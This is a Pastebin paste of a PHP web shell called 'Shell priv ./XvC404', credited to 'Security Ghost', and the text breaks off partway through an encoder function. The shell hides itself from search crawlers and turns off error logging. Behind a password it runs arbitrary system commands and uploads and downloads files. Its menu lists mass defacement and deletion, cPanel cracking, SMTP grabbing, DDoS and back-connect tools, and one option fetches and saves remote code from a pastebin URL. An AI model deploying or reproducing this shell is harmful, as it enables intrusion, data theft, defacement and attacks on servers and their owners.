SHARE
TWEET

./XvC404

a guest Jul 21st, 2017 129 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. $auth_pass = "d10d6b075de8234f2d33d8246aba5800";
  3. session_start();
  4. error_reporting(0);
  5. set_time_limit(0);
  6. @set_magic_quotes_runtime(0);
  7. @clearstatcache();
  8. @ini_set('error_log',NULL);
  9. @ini_set('log_errors',0);
  10. @ini_set('max_execution_time',0);
  11. @ini_set('output_buffering',0);
  12. @ini_set('display_errors', 0);
  13.  
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21.         header('HTTP/1.0 404 Not Found');
  22.         exit;
  23.     }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29.  <embed src="http://www.youtube.com/v/rr8Rx1Y2-WA&amp;autoplay=1&amp;loop=1&amp;playlist=besNDPvEwQw" type="application/x-shockwave-flash" wmode="transparent" height="1"width="1"></embed>
  30. <head>
  31. <title>Shell priv ./XvC404</title>
  32. <style type="text/css">
  33. html {
  34.      background: url(http://pegitboard.com/pics/t/103575.png) no-repeat center center fixed;
  35.   -webkit-background-size: cover;
  36.   -moz-background-size: cover;
  37.   -o-background-size: cover;
  38.   background-size: cover;
  39. }
  40. html,body{margin:0;padding:0;height:100%;font:13px Arial;}
  41. #wrapper{min-height:100%;position:relative;}
  42. #header{background:#f0f0f0;padding:5px;height:50px;color:#3000ff;}
  43. #body{padding-bottom:40px;padding-left:10px;}
  44. #footer{background:#f0f0f0;position:absolute;bottom:0;width:100%;
  45.    text-align:center;color:#408080;}
  46. header {
  47.     color: Aqua;
  48.     margin: 10px auto;
  49. }
  50. fieldset {
  51.     width: 250px;
  52.     height: 140px;
  53.     background: silver;
  54.     padding:4px 20px;
  55.     margin:0;
  56.     color:cinnamon;
  57.     letter-spacing:1px;
  58.      border: 1px solid #00ff00;box-shadow: 0px 0px 15px aqua;
  59.     text-decoration: none;
  60.  
  61. }
  62. body{cursor: url(http://cur.cursors-4u.net/toons/too-12/too1107.cur), progress !important;}
  63. input[type=password] {
  64.     width: 250px;
  65.     height: 25px;
  66.     color: red;
  67.     background: #000000;
  68.     border: 1px dotted green;
  69.     padding: 5px;
  70.     margin-left: 20px;
  71.     text-align: center;
  72. }
  73. input[type=text] {
  74.     width: 250px;
  75.     height: 25px;
  76.     color: red;
  77.     background: #000000;
  78.     border: 1px dotted green;
  79.     padding: 5px;
  80.     margin-left: 20px;
  81.     text-align: center;
  82. }
  83. </style>
  84. </head>
  85.  
  86. <center>
  87. <font face="monospace"><br>
  88. <a href="https://Security-Ghost.net" target="blank"><font color="white">Silahkan login Terlebih dahulu.</a>
  89.  
  90. <header>
  91. <pre>
  92.     </pre>
  93. </header>
  94. <br><br><br><br><br><br><br><br>
  95. <fieldset>
  96.             <label for="login">Username</label>
  97.         <form method="post">
  98. <input type="text" name="id" value="./XvC404">
  99. </form>
  100. Password
  101. <form method="post">
  102. <input type="password" name="pass"> <br><br>
  103. <input type="submit" value="Crotzz">
  104. </fieldset>
  105. </form>
  106. <style>
  107. </style>
  108. </head>
  109. <body>
  110.  <div id="footer" color=Red size=3><b>Copyright &copy 2016 - Security Ghost<br></p></div>
  111.  <div id="footer" color=Red size=3><b>All Rights Reserved.</></div>
  112. </font>
  113. </body>
  114. </head>
  115. <table border="0" cellspacing="1" cellpadding="4" class="tborder"><tr><td class="thead"><strong></strong></td></tr><tr><td class="trow1"></a></td></tr></table><br />
  116. <table border="0" cellspacing="1" cellpadding="4" class="tborder">
  117. <tbody><tr>
  118. <?php
  119. exit;
  120. }
  121. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  122.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  123.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  124.     else
  125.         login_shell();
  126. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  127.     @ob_clean();
  128.     $file = $_GET['file'];
  129.     header('Content-Description: File Transfer');
  130.     header('Content-Type: application/octet-stream');
  131.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  132.     header('Expires: 0');
  133.     header('Cache-Control: must-revalidate');
  134.     header('Pragma: public');
  135.     header('Content-Length: ' . filesize($file));
  136.     readfile($file);
  137.     exit;
  138. }
  139. ?>
  140. <html>
  141. <head>
  142. <title>Shell priv ./XvC404</title>
  143. <meta name='author' content='Security Ghost'>
  144. <meta charset="UTF-8">
  145. <style type='text/css'>
  146. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  147. html {
  148.      background: url(http://pegitboard.com/pics/t/103575.png) no-repeat center center fixed;
  149.   -webkit-background-size: cover;
  150.   -moz-background-size: cover;
  151.   -o-background-size: cover;
  152.   background-size: cover;
  153.     color: #ffffff;
  154.     font-family: 'Ubuntu';
  155.     font-size: 13px;
  156.     width: 100%;
  157. }
  158. body {
  159.      text-align: center;
  160.     resize: none;
  161.     text-shadow: 2px 4px 10px;
  162. }
  163. select {
  164.     width: 152px;
  165.     background: #000000;
  166.     color: Aqua;
  167.     border: 1px solid #ffffff;
  168.     margin: 5px auto;
  169.     padding-left: 5px;
  170.     font-family: 'Ubuntu';
  171.     font-size: 13px;
  172. }
  173. .terimakasih {
  174.     border: 1px solid #5cb85c;
  175.     border-radius :4px;
  176.     width: 550px;
  177.       border: 1px solid #00ff00;box-shadow: 0px 0px 15px white;
  178.     height: 100px;
  179. }
  180.  
  181. th {
  182.     padding: 10px;
  183. }
  184. .php
  185. *{
  186.     font-size:12px;
  187.     font-family:Tahoma,Verdana,Arial;
  188. }
  189. textarea {
  190.     border: 1px solid #FFFF00;
  191.     width: 100%;
  192.     height: 400px;
  193.     padding-left: 5px;
  194.     margin: 10px auto;
  195.     resize: none;
  196.     background: transparent;
  197.     color: #FFFF00;
  198.     font-family: 'Ubuntu';
  199.     font-size: 13px;
  200. }
  201. a {
  202.     color: lime;
  203.     text-decoration: none;
  204. }
  205. li {
  206.     display: inline;
  207.     margin: 5px;
  208.     padding: 5px;
  209. }
  210. table, th, td {
  211.     border-collapse:collapse;
  212.     font-family: Tahoma, Geneva, sans-serif;
  213.     background: transparent;
  214.     font-family: 'Ubuntu';
  215.     font-size: 13px;
  216.      border: 1px solid #00ff00;box-shadow: 0px 0px 15px blue;
  217.      
  218. }
  219. a:hover {cursor: url(http://cur.cursors-4u.net/toons/too-12/too1107.cur), progress !important;}
  220. body{cursor: url("http://downloads.totallyfreecursors.com/thumbnails/aliendance.gif"), auto;}
  221. th {
  222.     padding: 10px;
  223. }
  224. a:hover {
  225.     color: gold;
  226.     text-decoration: underline;
  227. }
  228. .table_home, .th_home, .td_home {
  229.     border: 1px solid blue;
  230. }
  231. #menu a{
  232.     padding:4px 20px;
  233.     margin:0;
  234.     background:#222222;
  235.     letter-spacing:1px;
  236.         width: 100%;
  237.     height: 170px;
  238.      border: 1px solid #00ff00;box-shadow: 0px 0px 15px lime;
  239.     color: orange;
  240.     text-decoration: none;
  241. }
  242. #kotak{
  243.     margin:0;
  244.     letter-spacing:1px;
  245.     height: 138px;
  246.     color:silver;
  247.      border: 1px solid blue;box-shadow: 0px 0px 15px red;
  248.      text-decoration: none;
  249. }
  250. .td_home{
  251.     margin:0;
  252.     color:cinnamon;
  253.     letter-spacing:1px;
  254.      border: 1px solid #00ff00;box-shadow: 0px 0px 15px aqua;
  255.     text-decoration: none;
  256. }
  257. .th_home{
  258.         background:red;
  259.     margin:0;
  260.     color:gold;
  261.     letter-spacing:1px;
  262.     text-decoration: none;
  263. }
  264. </style>
  265. </head>
  266. <?php
  267.  
  268. function w($dir,$perm) {
  269.     if(!is_writable($dir)) {
  270.         return "<font color=red>".$perm."</font>";
  271.     } else {
  272.         return "<font color=lime>".$perm."</font>";
  273.     }
  274. }
  275. function r($dir,$perm) {
  276.     if(!is_readable($dir)) {
  277.         return "<font color=red>".$perm."</font>";
  278.     } else {
  279.         return "<font color=lime>".$perm."</font>";
  280.     }
  281. }
  282. function exe($cmd) {
  283.     if(function_exists('system')) {        
  284.         @ob_start();      
  285.         @system($cmd);    
  286.         $buff = @ob_get_contents();        
  287.         @ob_end_clean();      
  288.         return $buff;  
  289.     } elseif(function_exists('exec')) {        
  290.         @exec($cmd,$results);      
  291.         $buff = "";        
  292.         foreach($results as $result) {        
  293.             $buff .= $result;      
  294.         } return $buff;    
  295.     } elseif(function_exists('passthru')) {        
  296.         @ob_start();      
  297.         @passthru($cmd);      
  298.         $buff = @ob_get_contents();        
  299.         @ob_end_clean();      
  300.         return $buff;  
  301.     } elseif(function_exists('shell_exec')) {      
  302.         $buff = @shell_exec($cmd);    
  303.         return $buff;  
  304.     }
  305. }
  306. function perms($file){
  307.     $perms = fileperms($file);
  308.     if (($perms & 0xC000) == 0xC000) {
  309.     // Socket
  310.     $info = 's';
  311.     } elseif (($perms & 0xA000) == 0xA000) {
  312.     // Symbolic Link
  313.     $info = 'l';
  314.     } elseif (($perms & 0x8000) == 0x8000) {
  315.     // Regular
  316.     $info = '-';
  317.     } elseif (($perms & 0x6000) == 0x6000) {
  318.     // Block special
  319.     $info = 'b';
  320.     } elseif (($perms & 0x4000) == 0x4000) {
  321.     // Directory
  322.     $info = 'd';
  323.     } elseif (($perms & 0x2000) == 0x2000) {
  324.     // Character special
  325.     $info = 'c';
  326.     } elseif (($perms & 0x1000) == 0x1000) {
  327.     // FIFO pipe
  328.     $info = 'p';
  329.     } else {
  330.     // Unknown
  331.     $info = 'u';
  332.     }
  333.         // Owner
  334.     $info .= (($perms & 0x0100) ? 'r' : '-');
  335.     $info .= (($perms & 0x0080) ? 'w' : '-');
  336.     $info .= (($perms & 0x0040) ?
  337.     (($perms & 0x0800) ? 's' : 'x' ) :
  338.     (($perms & 0x0800) ? 'S' : '-'));
  339.     // Group
  340.     $info .= (($perms & 0x0020) ? 'r' : '-');
  341.     $info .= (($perms & 0x0010) ? 'w' : '-');
  342.     $info .= (($perms & 0x0008) ?
  343.     (($perms & 0x0400) ? 's' : 'x' ) :
  344.     (($perms & 0x0400) ? 'S' : '-'));
  345.     // World
  346.     $info .= (($perms & 0x0004) ? 'r' : '-');
  347.     $info .= (($perms & 0x0002) ? 'w' : '-');
  348.     $info .= (($perms & 0x0001) ?
  349.     (($perms & 0x0200) ? 't' : 'x' ) :
  350.     (($perms & 0x0200) ? 'T' : '-'));
  351.     return $info;
  352. }
  353. function hdd($s) {
  354.     if($s >= 1073741824)
  355.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  356.     elseif($s >= 1048576)
  357.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  358.     elseif($s >= 1024)
  359.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  360.     else
  361.     return $s .' B';
  362. }
  363. function ambilKata($param, $kata1, $kata2){
  364.     if(strpos($param, $kata1) === FALSE) return FALSE;
  365.     if(strpos($param, $kata2) === FALSE) return FALSE;
  366.     $start = strpos($param, $kata1) + strlen($kata1);
  367.     $end = strpos($param, $kata2, $start);
  368.     $return = substr($param, $start, $end - $start);
  369.     return $return;
  370. }
  371. function getsource($url) {
  372.     $curl = curl_init($url);
  373.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  374.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  375.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  376.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  377.     $content = curl_exec($curl);
  378.             curl_close($curl);
  379.     return $content;
  380. }
  381. function bing($dork) {
  382.     $npage = 1;
  383.     $npages = 30000;
  384.     $allLinks = array();
  385.     $lll = array();
  386.     while($npage <= $npages) {
  387.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  388.         if($x) {
  389.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  390.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  391.             $npage = $npage + 10;
  392.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  393.         } else break;
  394.     }
  395.     $URLs = array();
  396.     foreach($allLinks as $url){
  397.         $exp = explode("/", $url);
  398.         $URLs[] = $exp[2];
  399.     }
  400.     $array = array_filter($URLs);
  401.     $array = array_unique($array);
  402.     $sss = count(array_unique($array));
  403.     foreach($array as $domain) {
  404.         echo $domain."\n";
  405.     }
  406. }
  407. function reverse($url) {
  408.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  409.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  410.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  411.           curl_setopt($ch, CURLOPT_HEADER, 0);
  412.           curl_setopt($ch, CURLOPT_POST, 1);
  413.     $resp = curl_exec($ch);
  414.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  415.     $array = explode(",,", $resp);
  416.     unset($array[0]);
  417.     foreach($array as $lnk) {
  418.         $lnk = "http://$lnk";
  419.         $lnk = str_replace(",", "", $lnk);
  420.         echo $lnk."\n";
  421.         ob_flush();
  422.         flush();
  423.     }
  424.         curl_close($ch);
  425. }
  426. if(get_magic_quotes_gpc()) {
  427.     function idx_ss($array) {
  428.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  429.     }
  430.     $_POST = idx_ss($_POST);
  431.     $_COOKIE = idx_ss($_COOKIE);
  432. }
  433.  
  434. if(isset($_GET['dir'])) {
  435.     $dir = $_GET['dir'];
  436.     chdir($dir);
  437. } else {
  438.     $dir = getcwd();
  439. }
  440. $kernel = php_uname();
  441. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  442. $dir = str_replace("\\","/",$dir);
  443. $scdir = explode("/", $dir);
  444. $freespace = hdd(disk_free_space("/"));
  445. $total = hdd(disk_total_space("/"));
  446. $used = $total - $freespace;
  447. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
  448. $ds = @ini_get("disable_functions");
  449. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  450. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  451. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  452. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  453. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  454. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  455. if(!function_exists('posix_getegid')) {
  456.     $user = @get_current_user();
  457.     $uid = @getmyuid();
  458.     $gid = @getmygid();
  459.     $group = "?";
  460. } else {
  461.     $uid = @posix_getpwuid(posix_geteuid());
  462.     $gid = @posix_getgrgid(posix_getegid());
  463.     $user = $uid['name'];
  464.     $uid = $uid['uid'];
  465.     $group = $gid['name'];
  466.     $gid = $gid['gid'];
  467. }
  468. echo '<center><div id="kotak">';
  469. echo "System: <font color=lime>".$kernel."</font><br>";
  470. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  471. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  472. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  473. echo "Safe Mode: $sm<br>";
  474. echo "Disable Functions: $show_ds<br>";
  475. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  476. echo "Current DIR: ";
  477. foreach($scdir as $c_dir => $cdir) {  
  478.     echo "<a href='?dir=";
  479.     for($i = 0; $i <= $c_dir; $i++) {
  480.         echo $scdir[$i];
  481.         if($i != $c_dir) {
  482.         echo "/";
  483.         }
  484.     }
  485.     echo "'>$cdir</a>/";
  486. }
  487. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  488. echo '<center><div id="menu">';
  489. echo "<ul><br>";
  490. echo "<a href='?'>Home</a>";
  491. echo "<a href='?dir=$dir&do=upload'>Upload</a>";
  492. echo "<a href='?dir=$dir&do=cmd'>Command</a>";
  493. echo "<a href='?dir=$dir&do=mass_deface'>Mass Deface</a>";
  494. echo "<a href='?dir=$dir&do=mass_delete'>Mass Delete</a>";
  495. echo "<a href='?dir=$dir&do=config'>Config</a>";
  496. echo "<a href='?dir=$dir&do=jumping'>Jumping</a>";
  497. echo "<a href='?dir=$dir&do=cpanel'>CPanel Crack</a>";
  498. echo "<a href='?dir=$dir&do=smtp'>SMTP Grabber</a>";
  499. echo "<a href='?dir=$dir&do=cgi'>CGI Telnet</a> ";
  500. echo "<br><br><a href='?dir=$dir&do=fake_root'>Fake Root</a>";
  501. echo "<a href='?dir=$dir&do=krdp_shell'>KRDP Shell</a>";
  502. echo "<a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a>";
  503. echo "<a href='?dir=$dir&do=auto_wp'>Auto Edit Title</a>";
  504. echo "<a href='?dir=$dir&do=zoneh'>Zone-H</a>";
  505. echo "<a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a>";
  506. echo "<a href='?dir=$dir&do=cpftp_auto'>CFTP Auto Deface</a>";
  507. echo "<br><br><a href='?dir=$dir&do=krdp_shell'>KRDP Shell</a>";
  508. echo "<a href='?dir=$dir&do=network'>network</a>";
  509. echo "<a href='?dir=$dir&do=about'>about</a>";
  510. echo "<a href='?dir=$dir&do=adminer'>Adminer</a>";
  511. echo "<a href='?dir=$dir&do=tool'>Tool</a>";
  512. echo "<a href='?dir=$dir&do=admf'>Admin Finder</a>";
  513. echo "<a href='?dir=$dir&do=symlink'>symlink</a>";
  514. echo "<a href='?dir=$dir&do=autoklik'>Auto Deface</a>";
  515. echo "<br><br><a href='?dir=$dir&do=whois'>Whois</a>";
  516. echo "<a href='?dir=$dir&do=csrf'>CSRF Online</a>";
  517. echo "<a href='?dir=$dir&do=ende'>Encode Decode</a>";
  518. echo "<a href='?dir=$dir&do=ddos'>DDos</a>";
  519. echo "<a href='?dir=$dir&do=shellscanner'>Shell Scanner</a>";
  520. echo "<a href='?dir=$dir&do=ende'>Encode Decode</a><br><br>";
  521. echo "<a href='?xp=bypassserver'>Full bypass</a>";
  522. echo "<a href='?dir=$dir&do=defacerid'>DefacerID</a>";
  523. echo "<a href='?dir=$dir&do=bconnet'>Back Connect</a>";
  524. echo "<a href='?dir=$dir&do=reverse'>Reverse IP</a>";
  525. echo "<a style='color: red;' href='?logout=true'>Logout</a>";
  526. echo "</ul>";
  527. echo "</div>";
  528. if($_GET['logout'] == true) {
  529.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  530.     echo "<script>window.location='?';</script>";
  531. } elseif($_GET['do'] == 'upload') {
  532.     echo "<center>";
  533.     if($_POST['upload']) {
  534.         if($_POST['tipe_upload'] == 'biasa') {
  535.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  536.                 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  537.             } else {
  538.                 $act = "<font color=red>failed to upload file</font>";
  539.             }
  540.         } else {
  541.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  542.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  543.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  544.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  545.                     $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  546.                 } else {
  547.                     $act = "<font color=red>failed to upload file</font>";
  548.                 }
  549.             } else {
  550.                 $act = "<font color=red>failed to upload file</font>";
  551.             }
  552.         }
  553.     }
  554.     echo "Upload File:
  555.     <form method='post' enctype='multipart/form-data'>
  556.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  557.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  558.     <input type='file' name='ix_file'>
  559.     <input type='submit' value='upload' name='upload'>
  560.     </form>";
  561.     echo $act;
  562.     echo "</center>";
  563. }
  564. function parah($pastebin, $nama_file){
  565.     $usa = file_get_contents("$pastebin");
  566.     $frr = fopen("$nama_file", 'w');
  567.     fwrite($frr, $usa);
  568. }
  569. $xp = @$_GET['xp'];
  570. if($xp == "bypassserver"){
  571.             $config = parah("https://pastebin.com/raw/8qNRW87t", "bypass.php");
  572.        echo '<center><font color =red><a href="bypass.php" target="_blank">Clik Here To Switch Bypass</a><br></font></center>';
  573. } elseif($_GET['do'] == 'whois') {
  574. @set_time_limit(0);
  575.    @error_reporting(0);
  576.    function sws_domain_info($site)
  577.    {
  578.    $getip = @file_get_contents("http://networktools.nl/whois/$site");
  579.    flush();
  580.    $ip = @findit($getip,'<pre>','</pre>');
  581.    return $ip;
  582.    flush();
  583.    }
  584.    function sws_net_info($site)
  585.    {
  586.    $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
  587.    $ip = @findit($getip,'<pre>','</pre>');
  588.    return $ip;
  589.    flush();
  590.    }
  591.    function sws_site_ser($site)
  592.    {
  593.    $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
  594.    $ip = @findit($getip,'<pre>','</pre>');
  595.    return $ip;
  596.    flush();
  597.    }
  598.    function sws_sup_dom($site)
  599.    {
  600.    $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
  601.    $ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
  602.    return $ip;
  603.    flush();
  604.    }
  605.    function sws_port_scan($ip)
  606.    {
  607.    $list_post = array('80','21','22','2082','25','53','110','443','143');
  608.    foreach ($list_post as $o_port)
  609.    {
  610.    $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
  611.    if($connect)
  612.    {
  613.    echo ' $ip : $o_port ??? <u style="color: blue">Open</u> <br /><br />';
  614.    flush();
  615.    }
  616.    }
  617.    }
  618.    function findit($mytext,$starttag,$endtag) {
  619.    $posLeft = @stripos($mytext,$starttag)+strlen($starttag);
  620.    $posRight = @stripos($mytext,$endtag,$posLeft+1);
  621.    return @substr($mytext,$posLeft,$posRight-$posLeft);
  622.    flush();
  623.    }
  624.    echo '<br><br><center>';
  625.    echo '
  626.     <br />
  627.     <div class="sc"><form method="post"><table>
  628.     <tr><th colspan="5" style="border: 2px lime dotted;">Whois Site</th></tr>
  629.     <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:white;" class="inputz" value="site.com" /> &nbsp <input class="inputzbut" type="submit" style="color:white;background-color:#000000" name="scan" value="Scan !" /></td></tr>
  630.     </table></form></div>';
  631.    if(isset($_POST['scan']))
  632.    {
  633.    $site = @htmlentities($_POST['site']);
  634.    if (empty($site)){die('<br /><br /> Not add IP .. !');}
  635.    $ip_port = @gethostbyname($site);
  636.    echo "
  637.    <br /><div class='sc2'>Scanning [ $site ip $ip_port ] ... </div>
  638.    <div class='tit'> <br /><br />|-------------- Port Server ------------------| <br /></div>
  639.    <div class='ru'> <br /><br /><pre>
  640.    ";
  641.    echo "".sws_port_scan($ip_port)." </pre></div> ";
  642.    flush();
  643.    echo '<div class="tit"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
  644.    <div class="ru">
  645.    <pre>".sws_domain_info($site)."</pre></div>';
  646.    flush();
  647.    echo '
  648.    <div class="tit"> <br /><br />|-------------- Network Info ------------------| <br /></div>
  649.    <div class="ru">
  650.    <pre>".sws_net_info($site)."</pre> </div>';
  651.    flush();
  652.    echo '<div class="tit"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
  653.    <div class="ru">
  654.    <pre>".sws_sup_dom($site)."</pre> </div>';
  655.    flush();
  656.    echo '<div class="tit"> <br /><br />|-------------- Site Server ------------------| <br /></div>
  657.    <div class="ru">
  658.    <pre>".sws_site_ser($site)."</pre> </div>
  659.    <div class="tit"> <br /><br />|-------------- END ------------------| <br /></div>';
  660.    flush();
  661.    }
  662.     echo '</center>';
  663.  
  664. } elseif($_GET['do'] == 'whois') {
  665. ?>
  666. <body >
  667. <center>
  668. <br>
  669. <form method="post"><br>
  670. <textarea class='inputz' cols=30 rows=5 name="mbutt" style="background:transparent;color:aqua;"></textarea><br><br>
  671. <select class='inputz' size="1" name="ope" style="background:red;color:aqua;">
  672. <option style='background:transparent;color:aqua;'><center>[#] Encryption [#]</option>
  673. <option value="urlencode" style='background:transparent;color:aqua;'>url</option>
  674. <option value="base64" style='background:transparent;color:aqua;'>Base64</option>
  675. <option value="ur" style='background:transparent;color:aqua;'>convert_uu</option>
  676. <option value="json" style='background:transparent;color:aqua;'>json</option>
  677. <option value="gzinflates" style='background:transparent;color:aqua;'>gzinflate - base64</option>
  678. <option value="str2" style='background:transparent;color:aqua;'>str_rot13 - base64</option>
  679. <option value="gzinflate" style='background:transparent;color:aqua;'>str_rot13 - gzinflate - base64</option>
  680. <option value="gzinflater" style='background:transparent;color:aqua;'>gzinflate - str_rot13 - base64</option>
  681. <option value="gzinflatex" style='background:transparent;color:aqua;'>gzinflate - str_rot13 - gzinflate - base64</option>
  682. <option value="gzinflatew" style='background:transparent;color:aqua;'>str_rot13 - convert_uu - url - gzinflate - str_rot13 - base64 - convert_uu - gzinflate - url - str_rot13 - gzinflate - base64</option>
  683. <option value="str" style='background:transparent;color:aqua;'>str_rot13 - gzinflate - str_rot13 - base64</option>
  684. <option value="url" style='background:transparent;color:aqua;'>base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
  685. <option value="hexencode" style='background:transparent;color:aqua;'>Hex Encode/Decode</option>
  686. <option value="md5" style='background:transparent;color:aqua;'><center>MD5 Hash</option>
  687. <option value="sha1" style='background:transparent;color:aqua;'>SHA1 Hash</option>
  688. <option value="str_rot13" style='background:transparent;color:aqua;'>ROT13 Hash</option>
  689. <option value="strlen" style='background:transparent;color:aqua;'>strlen</option>
  690. <option value="xxx" style='background:transparent;color:aqua;'>unescape</option>
  691. <option value="bbb" style='background:transparent;color:aqua;'>charAt</option>
  692. <option value="aaa" style='background:transparent;color:aqua;'>chr - bin2hex - substr</option>
  693. <option value="www" style='background:transparent;color:aqua;'>chr</option>
  694. <option value="sss" style='background:transparent;color:aqua;'>htmlspecialchars</option>
  695. <option value="eee" style='background:transparent;color:aqua;'>escape</option></select><br><input class='inputzbut' type='submit' name='submit' value='Encode' style="background:transparent;color:aqua;">
  696. <input class='inputzbut' type='submit' name='crack' value='Decode' style="background:transparent;color:aqua;"><br>
  697. </select>&nbsp;
  698. </form>
  699. <?php
  700. $submit = $_POST['submit'];
  701. if (isset($submit)){
  702. $op = $_POST["ope"];
  703. switch ($op) {case 'base64': $codi=base64_encode($text);
  704. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  705. break;case 'json' : $codi=json_encode(utf8_encode($text));
  706. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  707. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
  708. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
  709. break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
  710. break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
  711. break;case 'str2' : $codi=base64_encode(str_rot13($text));
  712. break;case 'urlencode' : $codi=rawurlencode($text);
  713. break;case 'hexencode' : $codi=bin2hex($text);
  714. break;case 'md5' : $codi=md5($text);
  715. break;case 'ur' : $codi=convert_uuencode($text);
  716. break;case 'str_rot13' : $codi=str_rot13($text);
  717. break;case 'sha1' : $codi=sha1($text);
  718. break;case 'strlen' : $codi=strlen($text);
  719. break;case 'xxx' : $codi=strlen(bin2hex($text));
  720. break;case 'bbb' : $codi=htmlentities(utf8_decode($text));
  721. break;case 'aaa' : $codi=chr(bin2hex(substr($text)));
  722. break;case 'www' : $codi=chr($text);
  723. break;case 'sss' : $codi=htmlspecialchars($text);
  724. break;case 'eee' : $codi=addslashes($text);
  725. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
  726. break;default:break;}}
  727.  
  728. $submit = $_POST['crack'];
  729. if (isset($submit)){
  730. $op = $_POST["ope"];
  731. switch ($op) {case 'base64': $codi=base64_decode($text);
  732. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  733. break;case 'json' : $codi=utf8_dencode(json_dencode($text));
  734. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
